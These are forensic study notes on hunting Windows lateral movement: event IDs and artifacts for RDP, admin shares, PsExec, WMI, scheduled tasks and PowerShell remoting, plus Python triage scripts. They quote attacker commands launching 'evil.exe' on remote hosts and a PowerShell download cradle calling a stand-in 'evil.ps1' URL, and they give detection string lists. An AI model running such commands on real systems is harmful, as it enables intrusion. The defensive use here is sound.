Day 2 FOR508.2
Evolution of Credential Attack Mitigations in Windows
Remote Desktop Services (RDP)
Hunt Evil: Lateral Movement Poster: Remote Desktop
Source Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4648 | Logon specifying alternate credentials |
%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-TerminalServices-RDPClient%4Operational.evtx | 1024 | Destination Host Name |
%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-TerminalServices-RDPClient%4Operational.evtx | 1102 | Destination IP Address |
Source Registry
Type | IOC | Remarks |
---|---|---|
Remote desktop destinations are tracked per-user | NTUSER\Software\Microsoft\Terminal Server Client\Servers | |
ShimCache – SYSTEM | mstsc.exe | Remote Desktop Client |
BAM/DAM – SYSTEM | mstsc.exe | Last Time Executed |
AmCache.hve | mstsc.exe | First Time Executed |
UserAssist – NTUSER.DAT | mstsc.exe | |
RecentApps – NTUSER.DAT | mstsc.exe | |
Source File System
Type | IOC | Remarks |
---|---|---|
Jumplists: C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\ | {MSTSC-APPID}-automaticDestinations-ms | Tracks remote desktop connection destination and times |
Prefetch: C:\Windows\Prefetch\ | mstsc.exe-{hash}.pf | first/last execution |
Bitmap Cache: C:\Users\<username>\AppData\Local\Microsoft\Terminal Server Client\Cache\ | bcache##.bmc | Check bmc-tools |
Target Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4624 | Logon Type 10; Source IP/Logon User Name |
security.evtx | 4778/4779 | IP Address of Source/Source System Name; Logon User Name |
%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-RemoteDesktopServices-RdpCoreTS%4Operational.evtx | 131 | Connection Attempts; Source IP |
%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-RemoteDesktopServices-RdpCoreTS%4Operational.evtx | 98 | Successful Connections |
Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx | 1149 | Source IP/Logon User Name; a blank user name may indicate use of Sticky Keys |
Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx | 21 | Source IP/Logon User Name |
Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx | 41 | Logon User Name |
Target Registry
Type | IOC | Remarks |
---|---|---|
ShimCache – SYSTEM | rdpclip.exe | |
ShimCache – SYSTEM | tstheme.exe | |
AmCache.hve | rdpclip.exe | |
AmCache.hve | tstheme.exe | |
Target File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ | rdpclip.exe-{hash}.pf tstheme.exe-{hash}.pf | first/last execution |
Windows Admin Shares (C$ - ADMIN$ - IPC$)
Hunt Evil: Lateral Movement Poster: Map Network Shares
- C$ - Drive volume shares
- ADMIN$ - %WINDOWSROOT%
- IPC$ - Named Pipes
Source Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4648 | Logon specifying alternate credentials |
Microsoft-Windows-SmbClient%4Security.evtx | 31001 | Failed logon to destination |
Source Registry
Type | IOC | Remarks |
---|---|---|
MountPoints2 | NTUSER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 | Remotely mapped shares |
Shellbags – USRCLASS.DAT | | Remote folders accessed inside an interactive session via Explorer by attackers |
ShimCache – SYSTEM | net.exe | |
BAM/DAM – SYSTEM | net.exe net1.exe | Last Time Executed |
AmCache.hve | net.exe net1.exe | First Time Executed |
Source File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ | net.exe-{hash}.pf net1.exe-{hash}.pf | first/last execution |
User Profile Artifacts | | Review shortcut files and jumplists for remote files accessed by attackers, if they had interactive access (RDP) |
Target Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4624 | Logon Type 3 |
security.evtx | 4672 | |
security.evtx | 4776 | NTLM if authenticating to Local System; Source Host Name/Logon User Name |
security.evtx | 4768 | TGT Granted; Source Host Name/Logon User Name (Available only on domain controller) |
security.evtx | 4769 | Service Ticket Granted if authenticating to Domain Controller |
security.evtx | 5140 | Share Access |
security.evtx | 5145 | Auditing of shared files – NOISY |
Target Registry
Type | IOC | Remarks |
---|---|---|
| | |
Target File System
Type | IOC | Remarks |
---|---|---|
File Creation | | |
PsExec
Hunt Evil: Lateral Movement Poster: PsExec
Source Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4648 | Logon specifying alternate credentials |
Source Registry
Type | IOC | Remarks |
---|---|---|
NTUSER.DAT | Software\SysInternals\PsExec\EulaAccepted | |
ShimCache – SYSTEM | psexec.exe | |
BAM/DAM – SYSTEM | * psexec.exe | Last Time Executed |
AmCache.hve | * psexec.exe | First Time Executed |
Source File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ | psexec.exe-{hash}.pf Possible references to other files accessed | first/last execution |
File Creation | psexec.exe | file downloaded and created on local host as the file is not native to Windows |
Target Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4648 | Logon specifying alternate credentials |
security.evtx | 4624 | Logon Type 3 (and Type 2 if "-u" Alternate Credentials are used) |
security.evtx | 4672 | |
security.evtx | 5140 | |
system.evtx | 7045 | |
Target Registry
Type | IOC | Remarks |
---|---|---|
New service creation configured | SYSTEM\CurrentControlSet\Services\PSEXESVC | "-r" option can allow attacker to rename service |
ShimCache – SYSTEM | psexesvc.exe | |
AmCache.hve | psexesvc.exe | First Time Executed |
Target File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ | | first/last execution |
File Creation | | |
Windows Remote Management Tools: Remote Services
Hunt Evil: Lateral Movement Poster: Remote Services
Source Event logs
Source | ID | Action |
---|---|---|
| | |
Source Registry
Type | IOC | Remarks |
---|---|---|
ShimCache – SYSTEM | sc.exe | |
AmCache.hve | sc.exe | First Time Executed |
Source File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ | | first/last execution |
Target Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4624 | Logon Type 3 (and Type 2 if "-u" Alternate Credentials are used) |
security.evtx | 4697 | |
system.evtx | 7034 | |
system.evtx | 7035 | |
system.evtx | 7036 | |
system.evtx | 7040 | |
system.evtx | 7045 | |
Target Registry
Type | IOC | Remarks |
---|---|---|
New service creation | SYSTEM\CurrentControlSet\Services\ | |
ShimCache – SYSTEM | evil.exe | ShimCache records existence of malicious service executable, unless implemented as a service DLL |
AmCache.hve | evil.exe | First Time Executed |
Target File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ | | first/last execution |
File Creation | | malicious |
Windows Remote Management Tools: WMI/WMIC
Hunt Evil: Lateral Movement Poster: WMI/WMIC
wmic /node:host process call create "C:\temp\evil.exe"
Invoke-WmiMethod -Computer host -Class Win32_Process -Name create -Argument "c:\temp\evil.exe"
Source Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4648 | Logon specifying alternate credentials |
security.evtx | 4697 | |
Source Registry
Type | IOC | Remarks |
---|---|---|
ShimCache – SYSTEM | wmic.exe | |
BAM/DAM – SYSTEM | wmic.exe | Last Time Executed |
AmCache.hve | wmic.exe | First Time Executed |
Source File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ | | first/last execution |
Target Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4624 | Logon Type 3 |
security.evtx | 4672 | |
Microsoft-Windows-WMI-Activity%4Operational.evtx | 5857 | |
Microsoft-Windows-WMI-Activity%4Operational.evtx | 5860 5861 | |
Target Registry
Type | IOC | Remarks |
---|---|---|
ShimCache – SYSTEM | | |
AmCache.hve | | First Time Executed |
Target File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ | | first/last execution |
File Creation | | .mof files can be used to manage the WMI Repository |
Changes in: C:\Windows\ | | Unauthorized changes to the WMI Repository |
Windows Remote Management Tools: Scheduled Tasks
Hunt Evil: Lateral Movement Poster: Scheduled Tasks
at \\host 13:00 "c:\temp\evil.exe"
schtasks /CREATE /TN taskname /TR c:\temp\evil.exe /SC once /RU "SYSTEM" /ST 13:00 /S host /U username
Source Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4648 | Logon specifying alternate credentials |
security.evtx | 4697 | |
Source Registry
Type | IOC | Remarks |
---|---|---|
ShimCache – SYSTEM | | |
BAM/DAM – SYSTEM | | Last Time Executed |
AmCache.hve | | First Time Executed |
Source File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ | | first/last execution |
Target Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4624 | Logon Type 3 |
security.evtx | 4672 | |
Microsoft-Windows-WMI-Activity%4Operational.evtx | 5857 | |
Microsoft-Windows-WMI-Activity%4Operational.evtx | 5860 5861 | |
Target Registry
Type | IOC | Remarks |
---|---|---|
SOFTWARE | | |
ShimCache – SYSTEM | | |
AmCache.hve | | First Time Executed |
Target File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ | | first/last execution |
File Creation | | |
Windows Remote Management Tools: PowerShell Remoting
Hunt Evil: Lateral Movement Poster: PowerShell Remoting
Enter-PSSession -ComputerName host
Invoke-Command -ComputerName host -ScriptBlock {Start-Process c:\temp\evil.exe}
Source Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4648 | Logon specifying alternate credentials |
Microsoft-Windows-WinRM%4Operational.evtx | 6 | WSMan Session initialize |
Microsoft-Windows-WinRM%4Operational.evtx | 8 15 16 33 | WSMan Session deinitialization |
Microsoft-Windows-PowerShell%4Operational.evtx | 40961 40962 | |
Microsoft-Windows-PowerShell%4Operational.evtx | 8193 8194 | |
Microsoft-Windows-PowerShell%4Operational.evtx | 8197 | Connect |
Source Registry
Type | IOC | Remarks |
---|---|---|
ShimCache – SYSTEM | | |
BAM/DAM – SYSTEM | | Last Time Executed |
AmCache.hve | | First Time Executed |
Source File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ | | first/last execution; PowerShell scripts (.ps1 files) that run within |
Command history: C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ | | With PS v5+, a history file with the previous 4096 commands is maintained per user |
Target Event logs
Source | ID | Action |
---|---|---|
security.evtx | 4624 | Logon Type 3 |
security.evtx | 4672 | |
Microsoft-Windows-PowerShell%4Operational.evtx | 4103 4104 | Script Block logging |
Microsoft-Windows-PowerShell%4Operational.evtx | 53504 | |
Windows PowerShell.evtx | 400 403 | |
Windows PowerShell.evtx | 800 | |
Microsoft-Windows-WinRM%4Operational.evtx | 91 | |
Microsoft-Windows-WinRM%4Operational.evtx | 168 | |
Target Registry
Type | IOC | Remarks |
---|---|---|
ShimCache – SYSTEM | | |
AmCache.hve | | First Time Executed |
SOFTWARE | | Attacker may change execution policy to a less restrictive setting, such as "bypass" |
Target File System
Type | IOC | Remarks |
---|---|---|
Prefetch: C:\Windows\Prefetch\ | | first/last execution |
File Creation | | |
Identify potential malware and determine whether it was executed
Source | ID | Action |
---|---|---|
system.evtx | 1001 | |
application.evtx | 1000 1001 1002 | |
Identify potential execution and record the full command line used to launch a process (Win7+)
Source | ID | Action |
---|---|---|
security.evtx | 4688 | |
security.evtx | 4689 | |
security.evtx | 4624 | Type 3 immediately before 4688 |
Enable: gpedit → Comp. config → Policies → Admin. templates → System → Audit Process Creation
http://for508.com/uhat4
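The logon and process indicators in the tables above (4624 type 10 for RDP, 4624 type 3 for admin shares, PsExec, WMI and WinRM, a 1149 with a blank user name, a 7045 installing PSEXESVC, and a type 3 logon immediately before a 4688) can be triaged offline over events exported as XML, for example with `Get-WinEvent ... | ForEach-Object { $_.ToXml() }`. The Python below is an added example, not FOR508 or SANS material: it parses records in that XML layout and runs the checks over constructed sample events (hosts, users, IPs and logon IDs are invented). It goes one step beyond the "immediately before" heuristic by joining the 4624 TargetLogonId to the 4688 SubjectLogonId, which is the field that actually ties the two events together; the 60-second window and the sample data are assumptions.

```python
"""Triage exported Windows event XML for the lateral-movement indicators
listed above.  Added example, not FOR508 material; sample events are constructed."""
import re
import xml.etree.ElementTree as ET
from datetime import datetime

EVT_NS = "http://schemas.microsoft.com/win/2004/08/events/event"


def _local(tag):
    """Strip the XML namespace from a tag name."""
    return tag.split("}", 1)[-1]


def _parse_time(system_time):
    """Windows writes up to seven fractional digits and a trailing Z."""
    return datetime.fromisoformat(re.sub(r"\.\d+", "", system_time).replace("Z", "+00:00"))


def parse_event(xml_text):
    """Flatten one <Event> into a dict: EventID, Channel, TimeCreated plus every
    <Data Name=...> value (EventData) or <ParamN> value (UserData, e.g. 1149)."""
    rec = {}
    for el in ET.fromstring(xml_text).iter():
        name = _local(el.tag)
        if name == "EventID":
            rec["EventID"] = int(el.text)
        elif name == "Channel":
            rec["Channel"] = el.text
        elif name == "TimeCreated":
            rec["TimeCreated"] = _parse_time(el.get("SystemTime"))
        elif name == "Data" and el.get("Name"):
            rec[el.get("Name")] = el.text or ""
        elif name.startswith("Param"):
            rec[name] = el.text or ""
    return rec


def find_remote_logons(events):
    """4624 with LogonType 10 (RDP) or 3 (network), plus 1149 whose user name
    (Param1) is blank, which the table above flags as a Sticky Keys indicator."""
    hits = []
    for e in events:
        if e.get("EventID") == 4624 and e.get("LogonType") in ("3", "10"):
            hits.append(("4624 type " + e["LogonType"], e.get("TargetUserName"), e.get("IpAddress")))
        elif e.get("EventID") == 1149 and not e.get("Param1", "").strip():
            hits.append(("1149 blank user", "", e.get("Param3")))
    return hits


def correlate_logon_to_process(events, window_seconds=60):
    """Pair each 4688 with a 4624 type-3 logon that precedes it within the window
    AND shares its logon ID (4624 TargetLogonId == 4688 SubjectLogonId)."""
    logons = [e for e in events if e.get("EventID") == 4624 and e.get("LogonType") == "3"]
    pairs = []
    for proc in (e for e in events if e.get("EventID") == 4688):
        for logon in logons:
            age = (proc["TimeCreated"] - logon["TimeCreated"]).total_seconds()
            if 0 <= age <= window_seconds and logon.get("TargetLogonId") == proc.get("SubjectLogonId"):
                pairs.append((logon.get("IpAddress"), logon.get("TargetUserName"),
                              proc.get("NewProcessName"), proc.get("CommandLine")))
    return pairs


def find_service_installs(events):
    """Every 7045 as (ServiceName, ImagePath, is_psexesvc).  PsExec -r installs
    under another name, so all 7045s are returned for review, not only the match."""
    return [(e.get("ServiceName"), e.get("ImagePath"), e.get("ServiceName") == "PSEXESVC")
            for e in events if e.get("EventID") == 7045]


def make_event(event_id, when, channel, data=None, params=None):
    """Build a constructed record in the layout Windows exports (sample data only)."""
    if params is not None:
        body = ('<UserData><EventXML xmlns="Event_NS">'
                + "".join("<Param%d>%s</Param%d>" % (i, v, i) for i, v in enumerate(params, 1))
                + "</EventXML></UserData>")
    else:
        body = ("<EventData>" + "".join('<Data Name="%s">%s</Data>' % kv for kv in (data or {}).items())
                + "</EventData>")
    return ('<Event xmlns="%s"><System><EventID>%d</EventID><TimeCreated SystemTime="%s"/>'
            "<Channel>%s</Channel></System>%s</Event>" % (EVT_NS, event_id, when, channel, body))


def sample_events():
    """Constructed: an RDP logon with a blank-user 1149, then a PsExec-style network
    logon, service install and PSEXESVC start, and a console logon that must not pair."""
    sec, rcm = "Security", "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
    raw = [
        make_event(1149, "2024-03-05T10:00:00.1234567Z", rcm, params=["", "", "10.1.2.3"]),
        make_event(4624, "2024-03-05T10:00:01Z", sec, {"LogonType": "10", "TargetUserName": "jdoe",
                   "IpAddress": "10.1.2.3", "TargetLogonId": "0x5a1"}),
        make_event(4624, "2024-03-05T10:05:00Z", sec, {"LogonType": "3", "TargetUserName": "svc_admin",
                   "IpAddress": "10.1.2.9", "TargetLogonId": "0x7b2"}),
        make_event(7045, "2024-03-05T10:05:01Z", "System", {"ServiceName": "PSEXESVC",
                   "ImagePath": r"%SystemRoot%\PSEXESVC.exe"}),
        make_event(4688, "2024-03-05T10:05:02Z", sec, {"SubjectLogonId": "0x7b2",
                   "NewProcessName": r"C:\Windows\PSEXESVC.exe", "CommandLine": r"C:\Windows\PSEXESVC.exe"}),
        make_event(4624, "2024-03-05T10:20:00Z", sec, {"LogonType": "2", "TargetUserName": "jdoe",
                   "IpAddress": "-", "TargetLogonId": "0x900"}),
        make_event(4688, "2024-03-05T10:20:05Z", sec, {"SubjectLogonId": "0x900",
                   "NewProcessName": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"}),
    ]
    return [parse_event(x) for x in raw]


if __name__ == "__main__":
    evts = sample_events()
    for hit in find_remote_logons(evts):
        print("remote logon:", hit)
    for pair in correlate_logon_to_process(evts):
        print("network logon -> process:", pair)
    for svc in find_service_installs(evts):
        print("service install:", svc)
```

Note that 4688 carries the CommandLine field only when the policy "Include command line in process creation events" is enabled in addition to Audit Process Creation; without it the correlation still works, but the last tuple element is empty.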
Identify PowerShell activity including pipeline output and full script content (Win10, PS5)
Source | ID | Action |
---|---|---|
PS command history: %userprofile%\AppData\Roaming\Microsoft\Windows\ | | By default, in Windows 10, the last 4096 typed commands. The history is stored separately for PowerShell and ISE. |
Microsoft-Windows-PowerShell/Operational | 4103 | |
Microsoft-Windows-PowerShell/Operational | 4104 | |
Microsoft-Windows-PowerShell/Operational | 4105 | Start Script: ignore as very noisy |
Microsoft-Windows-PowerShell/Operational | 4106 | Stop Script: ignore as very noisy |
Powershell.evtx | 400 | Not very useful, but you never know... |
Powershell.evtx | 800 | Not very useful, but you never know... |
Enable: gpedit → Comp. config → Policies → Admin. templates → Windows Components → PowerShell
Why to look for "older" PowerShell executions:
The command-history capability was introduced with PowerShell v5 in Windows 10. It is based on the third-party module PSReadLine, which is not included in the separately installed PowerShell 5 for previous versions of Windows.
The same reasoning applies to the "downgrade" to an older engine: powershell -Version 2 -Command <...>
Look for suspicious strings:
- IEX (New-Object Net.WebClient).DownloadString("http://evil.ps1")
- download
- Start-Process
- FromBase64String
- rundll32
- IEX
- Invoke-Expression
- WebClient
- powershell -version
- http
- bitstransfer
Check for obfuscation (use entropy/frequency detection).
Enable transcript logging, although it only writes to the user's folder.
gpedit → Comp. config → Policies → Admin. templates → Windows Components → PowerShell
Auditing WMI persistence
Source | ID | Action |
---|---|---|
security.evtx | 5857-5861 | |
security.evtx | 5861 | |
WMI-Activity/Operational | | Enabled by default on W10/2012R2+ |
Look for suspicious strings:
- CommandLine
- ActiveScript
- scrcons
- wbemcons
- powershell
- eval
- .vbs
- .ps1
- ActiveXObject
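Both indicator lists above (the PowerShell script-block strings and the WMI persistence strings) and the entropy/frequency check for obfuscation can be driven by one small scorer. The Python below is an added example, not FOR508 or SANS material: the indicator strings are taken from the notes, while the entropy threshold, the base64-run length and the sample script blocks and consumer definition are my own assumptions, constructed so that the benign block scores clean and the rest do not.

```python
"""Score PowerShell script blocks (event 4104) and WMI subscription consumers
against the indicator strings listed above, plus an entropy / base64-run check.
Added example, not FOR508 material; sample blocks are constructed."""
import math
import re
from collections import Counter

# Indicator lists from the notes above (case-insensitive substring matches).
POWERSHELL_INDICATORS = ["download", "Start-Process", "FromBase64String", "rundll32",
                         "IEX", "Invoke-Expression", "WebClient", "powershell -version",
                         "http", "bitstransfer"]
WMI_INDICATORS = ["CommandLine", "ActiveScript", "scrcons", "wbemcons", "powershell",
                  "eval", ".vbs", ".ps1", "ActiveXObject"]

_B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def shannon_entropy(text):
    """Bits per character: ordinary script text stays below ~4.8, while base64
    or randomised blobs push toward 6 (thresholds here are assumptions)."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def longest_base64_run(text):
    """Length of the longest base64-looking run of 40+ characters; encoded
    commands and FromBase64String arguments show up here."""
    return max((len(m.group(0)) for m in _B64_RUN.finditer(text)), default=0)


def find_indicators(text, indicators):
    """Indicator strings present in the text, in list order, case-insensitive."""
    lowered = text.lower()
    return [ind for ind in indicators if ind.lower() in lowered]


def score_block(text, indicators, entropy_threshold=5.0, b64_min_len=40):
    """Combine the three checks into one verdict for a block of text."""
    hits = find_indicators(text, indicators)
    entropy = shannon_entropy(text)
    b64 = longest_base64_run(text)
    return {"indicators": hits, "entropy": round(entropy, 2), "base64_run": b64,
            "suspicious": bool(hits) or entropy >= entropy_threshold or b64 >= b64_min_len}


def triage(blocks, indicators):
    """Return (block, score) only for blocks judged suspicious."""
    scored = [(b, score_block(b, indicators)) for b in blocks]
    return [(b, s) for b, s in scored if s["suspicious"]]


# Constructed samples: a benign 4104 block, the download cradle quoted in the
# notes, an encoded payload, and a WMI CommandLineEventConsumer definition.
BENIGN_4104 = "Get-Service | Where-Object Status -eq Running | Select-Object Name, Status"
CRADLE_4104 = 'IEX (New-Object Net.WebClient).DownloadString("http://evil.ps1")'
ENCODED_4104 = ("$p = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('"
                "QQBhAGEAYQBhAGEAYQBhAGEAYQBhAGEAYQBhAGEAYQBhAGEAYQBhAGEAYQBhAGEAYQBhAA=='))")
WMI_CONSUMER = ('instance of CommandLineEventConsumer { Name = "Updater"; '
                'CommandLineTemplate = "powershell.exe -File C:\\\\Temp\\\\u.ps1"; }')

if __name__ == "__main__":
    for block, score in triage([BENIGN_4104, CRADLE_4104, ENCODED_4104], POWERSHELL_INDICATORS):
        print("4104:", score, block[:60])
    for block, score in triage([WMI_CONSUMER], WMI_INDICATORS):
        print("WMI :", score, block[:60])
```

Feed it the `ScriptBlockText` of 4104 records and the `Name`/`CommandLineTemplate`/`ScriptText` of consumer instances from the WMI repository; the entropy figure is only meaningful on blocks of a few dozen characters or more, which is why the base64-run and indicator checks carry the decision for short one-liners.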
On Vista+ and 2008+, the Sysinternals PsTools can be run from your forensic workstation against the suspicious machine over the network, which avoids heavily tainting your evidence.
Get-WinEvent -FilterHashtable @{logname="Security";id=4624} | Where-Object { $_.Message -match "whatever" }
Get-WinEvent -ComputerName host -FilterHashtable @{logname="Security";id=4624} | Where-Object { $_.Message -match "whatever" }
Use the PowerShell scripts included in the SANS SEC505 course (see Day 6).
SYSMON
Deploy Sysmon (with -n -l -i) wherever possible.
Logs to: Applications and Services Logs/Microsoft/Windows/Sysmon/Operational
psexec \\remote-pc -u "DOMAIN\Administrator" -p "password" cmd /c "msiexec.exe /i \\server\share\application.msi /quiet /norestart"
- Event ID 1: Process creation
- Event ID 2: A process changed a file creation time
- Event ID 3: Network connection
- Event ID 4: Sysmon service state changed
- Event ID 5: Process terminated
- Event ID 6: Driver loaded
- Event ID 7: Image loaded
- Event ID 8: CreateRemoteThread
- Event ID 9: RawAccessRead
- Event ID 10: ProcessAccess
- Event ID 11: FileCreate
- Event ID 12: RegistryEvent (Object create and delete)
Offline system
Use a commercial forensic tool (FTK, EnCase) or Autopsy to carve.
TZWorks maintains a tool EVTXtract
Get-WinEvent -FilterHashtable @{Path="C:\where you put the*.evtx";id=4624} | Where-Object { $_.Message -match "whatever" }